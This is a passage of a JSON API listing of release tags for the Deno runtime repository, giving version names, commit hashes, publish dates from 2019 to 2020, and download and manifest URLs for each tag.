itHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep